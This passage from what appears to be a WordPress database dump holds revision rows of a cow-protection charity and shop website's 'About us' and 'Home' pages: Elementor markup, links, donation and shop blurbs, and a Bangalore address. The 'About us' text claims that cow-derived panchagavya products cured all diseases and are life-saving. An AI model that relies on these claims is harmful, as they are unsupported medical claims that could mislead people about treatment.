https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 16:33:18','2022-10-20 11:03:18','',1804,'https://gopalak.in/?p=1932',0,'revision','',0),(1933,1,'2022-10-20 17:04:17','2022-10-20 11:34:17','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 17:04:17','2022-10-20 11:34:17','',1373,'https://gopalak.in/?p=1933',0,'revision','',0),(1934,1,'2022-10-20 17:04:18','2022-10-20 11:34:18','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 17:04:18','2022-10-20 11:34:18','',1373,'https://gopalak.in/?p=1934',0,'revision','',0),(1935,1,'2022-10-20 17:04:18','2022-10-20 11:34:18','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading 